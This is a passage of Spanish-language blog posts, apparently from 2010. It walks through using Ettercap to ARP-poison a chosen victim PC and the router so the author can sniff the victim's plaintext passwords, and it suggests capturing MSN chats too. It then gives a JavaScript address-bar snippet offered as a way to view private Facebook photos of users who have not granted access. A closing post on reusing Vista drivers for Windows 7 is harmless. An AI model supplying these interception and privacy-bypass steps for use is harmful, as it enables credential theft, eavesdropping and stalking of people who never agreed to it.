se abre la ventana d seleccion del dispositivo d entrada, en mi caso ath0, si estuviera en red cableada seria el eth0... simplemente seleccionen su dispositivo conectado a la red.

cambia el menu superior, seleccionamos HOSTS -> SCAN FOR HOSTS...

esto corre 1 scanneo en la red para ver q hay conectado...

hacemos click en HOSTS -> HOSTS LIST en este caso salen 3 ips. 2 son pcs conectadas a la red y la 3era el router. lo q tenemos q saber es cual es la ip del router y la de la pc a envenenar.

para saber cual es el router en windows hacemos 1 ipconfig desde la consola y la ultima linea (gateway o "puerta d enlace predeterminada") es la ip del router.

en linux, desde la consola "ip route show" y sale tambien en la ultima linea (default via).

la maquina a envenenar ya deberian saberla o averiguarla, para eso c puede usar 1 scanner o simples ping -a en win para saber el nombre, nbtstat, etc. mmblookup, dig o lo q sea en linux.

en este caso el router es el 192.168.0.254 y la pc a envenenar la 192.168.0.101. seleccionamos la 254 y hacemos click en "add to target 1", despues seleccionamos la 101 y hacemos click en "add to target 2". en la consola inferior del programa se ve el log con los cambios que vamos haciendo.

seleccionamos el menu MITM -> ARP POISONING y en la ventana q sale checkeamos "SNIFF REMOTE CONNECTIONS" y aceptar.

ya esta corriendo el envenenamiento, d manera q todo el trafico entre 101 y 254 pasa por nosotros, ahora queda activar el sniffer para capturar. menu START -> START SNIFFING

solo queda esperar a q alguien meta 1 password para q salga en la parte inferior.

este metodo como dije solo sirve para contraseñas de texto plano, en la proxima entrada voy a poner el uso practico de certificados falsos y d sslstrip combinados con esto.

ahhh... las conversaciones d msn viajan en texto plano x si a alguien le interesa, activando ettercap junto con wireshark c pueden ver... tal vez lo explique con mas detalle tambien en el futuro pero no c si vale la pena 1 entrada... es bastante facil agregandolo a lo anterior ;)

26.4.10

como ver fotos privadas en facebook (otra vez...) v2010

no paso ni 1 año desde q c conocio el famoso bug del fql.query (hacer click aca) q tardaron meses en "solucionar" (?) y ya hay formas todavia mas sencillas d poder ver las fotos d los perfiles sin agregar ni aceptar o lo q sea q hagan para verlas en esas estupidas redes.

en este poco tiempo c multiplico la cantidad d phishing, spam y todo tipo d basura informatica. hace unos dias lei q estaban a full con 1 q avisaba q las claves habian sido modificadas y pedia hacer click en 1 adjunto (xD) para renovacion. obviamente el adjunto super infectado con todo lo q c puedan imaginar.

solo queda hacer algunos calculos, teniendo en cuenta q la red tiene unos 400 millones d usuarios, no hace falta q mucho porcentaje haga click... digamos q con 1% ya tenemos info d 4 millones. esos 4 millones seguramente no son muy lucidos ya q cayeron, asi q seguramente tendran tambien todo tipo d info sensible guardada en el sistema. si solo un 1% tenia datos bancarios tendriamos... 40000? je... mas q suficiente.

para los delincuentes informaticos (y no hackers q son 2 cosas bien distintas) es 1 olla d oro sin nadie q la cuide, pero... q c les puede decir a los pobres incautos q siguen en estas redes? ya es como q "lo necesitan"... hasta en el celu ultimamente xD


el metodo

el metodo... xq eso es lo q quiere la mayoria para ver las fotos d algun user q no los acepta o alguna d esas cosas q sacan el sueño a mas d 1. tal vez alguno reflexione y c d cuenta q hay vida fuera d facebook y q pueden conocer gente en la vida real como c hizo durante miles d años xD

1. loguearse en facebook

2. ir al perfil d la persona q quieran ver las fotos

3. copiar el siguiente codigo en la barra d direcciones:

javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');
tab_controller.changePage("photos");})()



4. presionar enter ;)

1.3.10

como conseguir drivers para windows 7


hace unas semanas tuve que reinstalar una compaq f756 que viene con el aborrecible windows vista y x supuesto se me ocurrio pasarla a 7, q si bien sigue sufriendo la mayoria d las maldiciones d windows tiene una performance muchisimo mejor q el anterior.

la 1era vez que instale 7 fue alguna beta en una maquina virtual d vmware asignandole solo 1 nucleo y 512mb d memoria, para mi sorpresa corria muy bien con tan pocos recursos, por lo que podriamos decir q el sistema es capaz d funcionar en cualquier hardware q soporte vista (y mucho menos tambien) sin el mas minimo problema.

en este caso hablamos d 1 laptop con 2gb d ram, micro turionX2 a 1.9ghz y video Nvidia Gforce 7000m. viene d fabrica con vista, el cual le da segun su sistema de benchmarking (o como c llame lo q hace para testear el hard) 2.1 puntos. la maquina es lo suficientemente nueva como para cualquier sistema, pero... pero... yendo a buscar los drivers a la pag d HP:

http://h10025.www1.hp.com/ewfrf/wc/softwareCategory?product=3653215&lc=en&cc=us&dlc=en&lang=en&cc=us

era obvio no? no hay soporte... je


el negocio del hard, los drivers, etc

sin embargo a la izquierda d la pagina encontramos 1 link q dice "Information about Windows 7 software and drivers", lo cual nos puede llegar a dar esperanzas... x supuesto hasta ver el link solamente.

Ahi podemos leer q "HP esta actualmente testeando y calificando soft y drivers para win 7 para los modelos listados en la siguiente tabla" (obviamente no esta la f756), y sigue con q "este proceso no sera completado antes d la liberacion d win 7 antes del 22.10.09". ni c habla entonces d liberar oficialmente drivers para este modelo.

mmmm... xq? no lo soporta? tiene algun problema? tan dificil es?? nah... mejor q la tiren y compren otra maquina "windows 7 ready" seguramente piensan los genios d marketing d HP.

el negocio cuando salio vista era q para correrlo habia q tener 1 pc monstruo. como el user final quiere tener lo ultimo (aunque no sabe ni para q) fue record la venta d laptops, desktops, clones y lo q sea q pudiera correr 1 vista. ahora como la vieja maquina sobra para correr 7 la complican x el lado d los drivers...

sin embargo, como los drivers c pueden conseguir aunque HP no los entregue siempre hay quien saca provecho del problema d los demas y lo convierte en $$, como x ej estos sres q venden los drivers d win7 para el modelo d compaq en cuestion:


http://restore-disk.com/restoredisks/HP/HPCompaq/HP-Compaq-Presario-F756NR-Windows-7-Restore-Disk-315147.html

y a 11.44€!! me imagino q para los europeos seran monedas pero aca en argentina no es tan barato y en otros paises latinoamericanos debe ser una fortuna casi.

entonces... como puede ser q un 3ero venda los drivers para 1 equipo q el propio fabricante dice q no soporta el sistema??

en fin... esto no es propio d HP sino d la mayoria d las marcas, hace un rato estaba leyendo en 1 foro d asus quejas d los usuarios al respecto. lo q pasa es q otra vez c me cruzo hp/compaq en el medio d mis problemas... je


la solucion

antes d hacer el pasaje estuve googleando un poco y vi mucha gente con problemas para hacer el pasaje a 7 en la f756, drivers d la cam, video, problemas d reinicios, etc. la solucion q use yo es bien facil y c puede aplicar a cualquier equipo:

1. backupear los drivers d vista con cualquier soft para dicho proposito. x ej drivermax:

http://www.innovative-sol.com/drivermax/

2. instalar 7

3. buscar en el admin d dispositivos los drivers q faltan (en mi caso eran solo 2 o 3) y mandar al sistema a buscarlos en la carpeta q guardamos con los drivers d vista.

4. driver d video en la pag d nvidia, ati, o la q corresponda.

5. disfrutar d tu win7.

con este metodo la maquina levanto todos los dispositivos sin problemas y x supuesto quedo hecha 1 avion a comparacion d como iba con el vista. ahhh y el sistema d puntuacion le da 3.0 a la misma maquina xD

entonces... xq no liberan los drivers en lugar d dejar q los venda cualquiera x ahi? si todos sabemos q funciona. bah... no c xq no me cayo la boca y mejor me hago yo tambien 1 web d venta d drivers para win7 xDD

conclusion

los drivers d vista en su mayoria funcionan con windows 7. simplemente hagan backup o descarguen el d vista d la web del fabricante.

para finalizar dejo los links a las paginas d descarga d drivers para 7 d las principales marcas:

Windows 7 Laptop / Notebook Drivers

Windows 7 Graphic & Sound Cards Drivers

Windows 7 Printer & Scanner Drivers